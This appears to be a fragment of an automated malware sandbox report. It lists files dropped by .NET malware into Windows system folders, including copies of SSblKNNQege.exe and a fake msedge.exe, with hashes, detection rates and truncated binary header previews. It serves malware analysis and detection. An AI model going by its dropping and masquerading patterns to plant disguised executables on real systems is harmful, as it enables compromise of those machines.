                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                    C:\Program Files (x86)\MSECache\OfficeKMS\win8\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with very long lines (747), with no line terminators
                                    Category:dropped
                                    Size (bytes):747
                                    Entropy (8bit):5.9037999471155995
                                    Encrypted:false
                                    SSDEEP:12:OlNQoOG6oYNKjYqGWmpdnt9KWfgJDpJM1UJP4wpSrQ0/qDr7NRXmCNpWJ:ODQTG50KMqipht9Kkg2mJPvpSrQVDnXS
                                    MD5:3779F3CF281717164D157EDF6B471228
                                    SHA1:4DEF3DE1BA47EC1A73202DFFAB8461A833F703C6
                                    SHA-256:4C5FB14133ACFE60D9B92ABD191ECB883A4BB01CAAC8D42B5FBE7D97C483645C
                                    SHA-512:BD7EBB6011C426D75BC43D0B846250A66A51AF5BFFE9691424D33D7F3876B86D794890FC08471FACCDCFE7642967843BCF3CF4404B1F4B35A865A88EF295DB32
                                    Malicious:false
                                    Preview:QkIAkhJPg1hHqPzxx9ouLN2B5FFApL6QOTSTxK4joanziMVdeMrTJojDrGFecJjU5Q3X6f9mFFGukCdsumgdemHktPlqEZGf1S4RT8g8MENDhydpnWu0nF0SISnr4Shp9l2RILZwFhRZZDD5w6CspP2vcmJAUyD3giE55Mhc78uFyb3FPs58QzAttGygCYbRdX209H9kZkurew7AsDvm3FnriUMzXBajgdlajCFHtVjqFSP6Jyx8myXYuLSo5KMYJLKALhbq7n3if7lPFPqjNb6rGNpXubMjILg3IOvlWGA85z2xjDjpenKrOc471E6gaUaUbsH0eEMGb7wQU2yr1hEeByppUxtSKdhlZhW15tKZbDQQqnn9PPo3P6TmCbfrU467ZL1xf7vIXpD7hY9qKtC5yoVcOtyeOdEgGS1fw0eSegfk2VEocyhl1AIvzYivIQ44kg1Phd4UPubSIvk2oJBZ5doGJFpXRsJNml9WezH84NVHj0mDypH9Oe8G1uFbxhCgkOphwNYzCDfsHhhTdmillK8Hn2ettpKWKzhUKFRlRR7L9P9UNw8L8b5aPi33toFW2IiSAMIXU7TTNwIX3Jf7r8Xs4GEmLY1mMkT1qqUBnk1BHlNdag9jIHo3uzY3HgM5FrHmdRqNzeUHHWlT3lMpYSdF6ZG1Sb4HY55adk9JzwuoxhwYOF9fTghxNCqEKz4XkNtLbLzSlD0mizRYmsnNbYx1YINb458A1WEjyl6

                                    C:\Program Files (x86)\Microsoft Office\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Program Files (x86)\Microsoft Office\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (731), with no line terminators
                                    Category:dropped
                                    Size (bytes):731
                                    Entropy (8bit):5.8885730358590855
                                    Encrypted:false
                                    SSDEEP:12:JUHNX/IzSNSW4bwy78Sf9bqF436BxOT7JU/Q++5K/OVXVqIOK3icxfJw:Cg1W0wy7Hfp6O6B8T2L67OwfO
                                    MD5:13716B93ED89C117C7AEFED59CA1CB44
                                    SHA1:C3BDCD317752662878FF3208FBF055BEF00CA5C6
                                    SHA-256:DDB950FE67B4DDD699924FF8A41B18DC62A321706DF31D17DDA426E1168F4EB5
                                    SHA-512:F1B6232CC98F9633CA40E477E23DA4176332B6A56FD80C54BD0D6073B1C6C9A1520609565EE3EB624A91E14C72AAD0F16CE804A00C724A31ED3E1F65C293127E
                                    Malicious:false
                                    Preview:WYhbwt4pQtYSOyPKHWQrnTpKqznq7bHeQeXTPIChMtOiMhTYt3S9wmGCsWv7GOrym3Bta548Ute3FH7IfP6DJHsoYVk2XEa7BZ6Tgj7x8TpDHM6lYmb0RopeLXVFVBlPSg2pKom5SJEzcpgMY8eumkqXucIIO1b7saulTRauAfiIj0Bf0IqWh0ms0e4sgdrarHGC452HhuuHBix4amRFKEZ2xCuyWsNgyIabt9l5QjzxGfqSr9R3LlPmsOO1KDuzgNS2HWLbBWzlPmvSWcHWaTVN2xtfvtuNzAQ3NxKVy02zwoXGc5fs5YYN1E9UmqqSllvPV1FiRwhkbgbOanCzOCSblDBIy0sIKkNK2Hul07bI0xwVnv38n1EjTUnR06taEZa0TQWS2b8QlJkyRqeC6teTgn1hdcv3NAEaX5CWZlFM2x8JtzAJbreU4HUqZyyZqEDkFKaWnInVoSatorxoclbgfugQlW7kwpgytXEjYogTDIqmqkBrAK7FmhFVnKuRKDj8vm9QnNPyFHdXE4jAUPjlsbLMSt6N3OJ9jr0ElvEx5I9eErRtlt74d7PTax73RB408dyWDeZiLwqjbqIlcMmJRPglcgoyyKf3OJgl34qHUYtqRq2uoWbFZvit6N4g0luARwVSJhrhgfz3fzTvo4JbsaeckxoqAJRsnsZfUkkHo4i35pNH3I15cTR1S2rW3AgWOGQxaybEUBwy1kh5kgw2SVQ

                                    C:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1168
                                    Entropy (8bit):4.448520842480604
                                    Encrypted:false
                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                    Malicious:false
                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.895894453645735
                                    Encrypted:false
                                    SSDEEP:48:6SmZt5xZ8RxeOAkFJOcV4MKe28dFXlvqBHjuulB+hnqXSfbNtm:EmxvxVx9lVvkVTkZzNt
                                    MD5:27AD647A093741228E7D299DC5C7477D
                                    SHA1:F8BF50A4839372DC0B4E36466B20996CE4983C2F
                                    SHA-256:5298F153575C2D4B14F06C47AA6D0E2AFFC96934B3F5CA20658A8ED63CA4BFD1
                                    SHA-512:3A813F0F30C2C01591D1A61A22108EDE271EEE8008E3637826FC5BB259D6463157BA50E21552EFBB46613B0AD80F97B51315B401995ABE0809CE2501E6CFEF32
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..g.............................'... ...@....@.. ....................................@.................................H'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!.. .............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):258
                                    Entropy (8bit):5.776556088797463
                                    Encrypted:false
                                    SSDEEP:6:Lex5QMxLTkcGFWa7haofNZV2c4hYhdFrWSKNvP7kQQis9UQ:jgAc5Sbfr7hjWPAlTJ
                                    MD5:F9008B45C83258287E7A76C91A9AE3B4
                                    SHA1:9D556D38E499694B3EFE14D4C47C11232B0FC186
                                    SHA-256:3464E82C48A6C83C357FC0FB761A373D35AD1D6061CBB48C1EA7DAC8A2A35995
                                    SHA-512:E514CF5D8682EA665C71A0EFA0D0A7CD2E2B7F06E1332A3BF6013B3E679A2EE9E57DDAC6F299057B75DFB0D7808B2FECEED135F0F15A3133675E83FEEAADEA61
                                    Malicious:false
                                    Preview:Uuc0jyuzx9zgeFRZ2XqwutjvTquYIqLWNH1Dbzoyi445rhrROxzIYbflLrh2EWrHxcTWOO8Ds1NzynDv9cKU0D8vmQ2tRwuMNxHPOVC9zwZhNpwhov3lLWQudhu8WOv6HBmBfyhoaKeDnbi7dVFg3IA0gXvqkEnlAdZLCuBzNPLA2NHC9xeAIPC9BweID1DWh3CJBW4tUQSo7A8TQsrxjmcvbaKQQ2wWLzd8K7Am2vq26YBAyK1UJPw4bRslMocbd5

                                    C:\Program Files\Microsoft\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                    C:\Program Files\Microsoft\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):91
                                    Entropy (8bit):5.330228535846263
                                    Encrypted:false
                                    SSDEEP:3:cqFQYrSfiw0tQO/HlyPXS6PnRp:cGQYrxw0vyPXZPRp
                                    MD5:2497464EF06996418B6F6252144EB11E
                                    SHA1:32C58986BAE49B76DF568818A9D752CA6817351D
                                    SHA-256:344CD43A83F3920DD7E41DC827645A2F20B1B7FE48103B056BB77C31DA179D0C
                                    SHA-512:7169FB03AAF8CF270795478315ECFBC0F4E61E47F58FF195BF6647B46682BF37C4AF05B1744EEF9C0604B83AEFB26824F86B537E6E1C47D917750E3B214338DC
                                    Malicious:false
                                    Preview:CPm69CCiMXeZ9ldKxLHKiUp8qKzZL4B5rp4neXcFfAwUe7dPBCUABCgsknPyMnWSWjrTqzpasCphhVetrkXJjB4pIMD

                                    C:\Program Files\Windows Portable Devices\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Program Files\Windows Portable Devices\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (576), with no line terminators
                                    Category:dropped
                                    Size (bytes):576
                                    Entropy (8bit):5.89646583755895
                                    Encrypted:false
                                    SSDEEP:12:IxN6fqFJfLSQeweI3j+wD2r7rKgl/KzGYoCq+8mrtEYT5i3o3:LfqFJjSmP+drSgqnqy5uo3
                                    MD5:291D3C70935F9841BEF0115E7F730697
                                    SHA1:ED47B652A9844673E86D85B3B3CD315A08389ECE
                                    SHA-256:38B85BD5FB066FE9C6E1B6CC5AE2C54A66C280579CA91AEB9540E11D79B055FE
                                    SHA-512:49FBAC8509B02952C59A177F707F4E8A9845C6765438DAB728122F8B7C34C9358EA18CF2683F2551B17936EBA2E748C24C59243C09DF3DB49C92C27D1195E66E
                                    Malicious:false
                                    Preview:yDYJcFBcM5Cig3PZaOSPYA53dyBjlEU882coMCLXaBsgF8cPCToqfqKxHepoDc0IlEkoakMXC5zXRYyfVvgSZncRrohrWhT7Lk5AYxzbGQok1xfsqKSR5hs7lS7wDeBel1LrdxHh6EMJ92a3IyBMPCCo28ZF0CYlPK8AmyP2CuU1Uj8s2DnPdzOjzgzeYBr3pk3y4aRUiIJerKTSAqNwZJHZ5YKF9veBDbMtpJycwTqVqu2pNgesy4egce2fPMVxnIaP8jn01uAGcwtLgf2cQwMJ6pRLRSMk83riTmqn3o0D4YDquq9tU2g15RTSSbjjiaHjFL23yOim5IPimkbkTcQFWzmBTYUbFRfdQdliyG4FT46wCuqsA8PFJCNPi0ka3HhonvSI92vNhKvb3z9irmaGBaTOQVA7feLMXRJRcitINCh9QvWt1BsQqbmMbD1n2yrD8jElprGJ3S282U7f9QFev5f6p60YqFQZVdArquDK5jXYinTGGWnlsMSDDI6s1rdxBdnZTQyPN5jMhHXBntSTcpqIL7niyUSNFjWEA4wzhYYwnGf5u4FIYJVWweNW

                                    C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\WindowsHolographicDevices\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (756), with no line terminators
                                    Category:dropped
                                    Size (bytes):756
                                    Entropy (8bit):5.914226149852968
                                    Encrypted:false
                                    SSDEEP:12:o98LsiQhGw7czVqfkYx7XqOnFJkr8wvcqiREu84fMtWCYjdLlAYmxZ+XK9s2agFt:s8QKhGk0Jhv3RA4vCYh5Ju95agP
                                    MD5:AA62D04C3BC4A439B2AE2109A256A3C8
                                    SHA1:834643D9932AF4AE859006F34285EE3083EE0E48
                                    SHA-256:8A31638ACBDF0A24114352CC9EB8C80498F4CD25B5BD11FAD493D79B99677FCF
                                    SHA-512:30C426A3C095127076920AC1C01353A63899EC99C8B71E3FF5AD3E9484025749E788B717F6D47A985204D8A17DF2D90228F86F1ABF3E1D04C5D7A7237A421E7D
                                    Malicious:false
                                    Preview:TAs6cvER4fFbrx3OKy6OARgrZMR7fJSAgLb4XL6XQF29I55cgncgKuuBeAgQeHvvME4gW9092i75ZhieRya1qwzwaZaWop3JTHwDAYGhwdnmxym6cC8pq4FaPIF6jeVNoxmSvee3s2EMIN9mxd4lrOdYBVy1SK8SIa79MUL7hF7xz2RBJdJFjtfaUNQaqmki4vEsQ9acS6EmQpjJDxsyA3sZ4ho8DvR5eZ3EyjvJDqwmp3JooGW33vhACoytUbYhpIH1weUeCjvUGGuAXAU6YXCs12BJuBymRP7gvR2Jw20UAN464xVUGbIRGZA3dLtAuJC0INOGHLKfgrro7EP7qefzGpaWR8pkJ0j0LDxqiPN4RmuYrV5Y5wTQnMtdx2yIfkWqI0d4RjYbRkid4Bo5CRpXhTN8TU2qaEZqQEQ02BHWX29DoQjwN2GO49Iynek7qrAML1NzuyCAJS9pTKUDuGch8KwR5bMXbKqq1w1wCtBZ0FFl9dfdKgMjOcOBF53Tlpj9mTxhShAAFDr2FKRc6tM48HbYh0rG0rxKfF9qq7KnfLdLvV54obW2coBf1Z9c04KYPgX9Llv8ijZwnQnL4wcYU5s1EdyR8swlBF5O86tDpYU2PO1lvxiEbvDTyg4rweAzwxviVZN7CZt6l0l0mNfKJsKPBlZcBCQKXeFbdSPWkkBBCGs84EFi80qEnfgt9u5AIijHuKWT7JjjqIN53bi76sMhxBy7wgWzoB2dhkNtrwkzQGYe

                                    C:\Recovery\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Recovery\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (359), with no line terminators
                                    Category:dropped
                                    Size (bytes):359
                                    Entropy (8bit):5.844290482292296
                                    Encrypted:false
                                    SSDEEP:6:hTuXhchl53xSFkGgerRWs7V9h1ty+6S3XPTpFKRqRzkl/OlNdD/AuVCr:hQGzBSeGge0STv6S3NFKfmCuVQ
                                    MD5:702678BE7DAF53283581C986E9874A51
                                    SHA1:1B1E25B47A06D43B80FF0744AF7188F39B9CE44B
                                    SHA-256:0AC05AFA38B9734B2080A5C8F90E77CE905B56670ECABF8A3276CFB31CA4C63F
                                    SHA-512:555E693010416848608BB57D2DC75B86CEEFEC56C33A522A95569D13B4FF877ACBB2D4B25DD9903B30FA19C1DA53EED60B795723C1B00C9916397BB3C5FF7F14
                                    Malicious:false
                                    Preview:O9M2EJgmYmE8o602FwBm0oDdOC3mgwJIXzwzRLjTqaVWn63eEbnvDlfj5soCQ4Glc5kyJBl3Ns5ZTq0SIYiEIYFvUN3ihgDwUt4rWEUC0uiUqFPO2W31VBcEzyd6ICVqpJFkwJ5DDfOYzvFP7pqLnLaTRz2hlY4yZ1pg9pbsazxzxEOEsO9dWJDdsvS7RYcpla98FiPRN7vxYlgMkxyXZbbPyLyOWebCXIOXFQ8K8rPYYQFHPGWdjFQK8uK3tB5tftZPWIHUyoYrLD0hGr8QH8cR1DYVGEa6wg2p0zuG8Co4qi843mxCDolhQHXTtwOuOc5pKLrQ71RFTilTFebdRX3H4VYsbaXMx4pOnTt

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):251
                                    Entropy (8bit):5.786204724454456
                                    Encrypted:false
                                    SSDEEP:6:3T/FjawnBXhzDVZf3DEgaPMeYXHVB5cCeg6omq2PU2zQ3gp:DtuwBXZfXaPMeUVBeCKwQUBQp
                                    MD5:EE5C684D825BCD8DCE3C9D03E2CBBDE5
                                    SHA1:6CA732E76BCC9A72D5A8BE2B12C9DD0DB4B08A77
                                    SHA-256:B44E20042C647C82B68A453027A29B942328CDDA8815C5C34DF4463EE581FB2F
                                    SHA-512:36E1C4B3936841BC75D4324F11792B0C041C8DB4D8E75A82E19F5B7280D0BD5EC867B23BE6B8BC0EDB296BDADD27014BB5F4CC93A1F0D6E99ABBB556E5B79828
                                    Malicious:false
